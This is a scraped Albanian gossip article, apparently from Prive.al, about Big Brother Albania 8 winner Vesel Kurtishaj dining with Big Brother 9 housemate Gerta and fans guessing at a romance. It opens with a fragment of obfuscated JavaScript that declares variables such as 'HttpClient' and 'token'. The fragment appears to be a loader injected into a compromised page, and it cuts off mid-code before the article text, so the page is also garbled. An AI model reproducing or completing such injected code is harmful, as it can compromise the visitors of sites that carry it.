;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

E papritur! Veseli përplot zemra përkrah banores së Big Brother 9

By

Fituesi i Big Brother Albania 8, Vesel Kurtishaj është treguar shumë aktiv për të dhënë opinionet e tij pas nisjes së edicionit të ri të spektaklit.

Në media e në rrjete sociale, atë e kemi parë vazhdimisht duke komentuar banorët dhe ngjarjet teksa lidhjet me konkurentët, si në rastin e Damianos janë dëshmuar përmes fotografive se kanë qenë edhe më të hershme.

Por, Veselin nuk e kemi parë më herët me një banore të Big Brother e cila u largua në javët e para ndonëse u konsiderua favorite që në fillim.

Fjala është për Gertën, me të cilën fituesi i edicionit të vitit 2015 ka darkuar mbrëmë në Tiranë me ç’rast kanë shkrepur edhe një foto të përbashkët.

Në imazhin fillestar të ndarë me fansat, Veseli e ka konsideruar Gertën si vajzën më të mirë që ka Bigu teksa më pas, postimin e ka ndryshuar duke i lënë vetëm disa figura të zemrave.

Kjo ka mjaftuar për t’u hedhur dilemat e para nga ana e fansave për një lidhje të mundshme të çiftit.

Kujtojmë se Veseli që prej ndarjes nga Tea nuk është përfolur mbi lidhje të reja teksa Gerta, nuk e vazhdoi relacionin me partnerin në lojë, Denisin i cili në fakt vazhdimisht e trumbetoi mos gatitshmërinë e tij për të vazhduar një lidhje jashtë.

Se çka po zihet, mbetet të deshmohet nga koha! /Prive.al/

??❤

A post shared by Official Profile (@veselkurtishaj) on

Artikuj të ngjashëm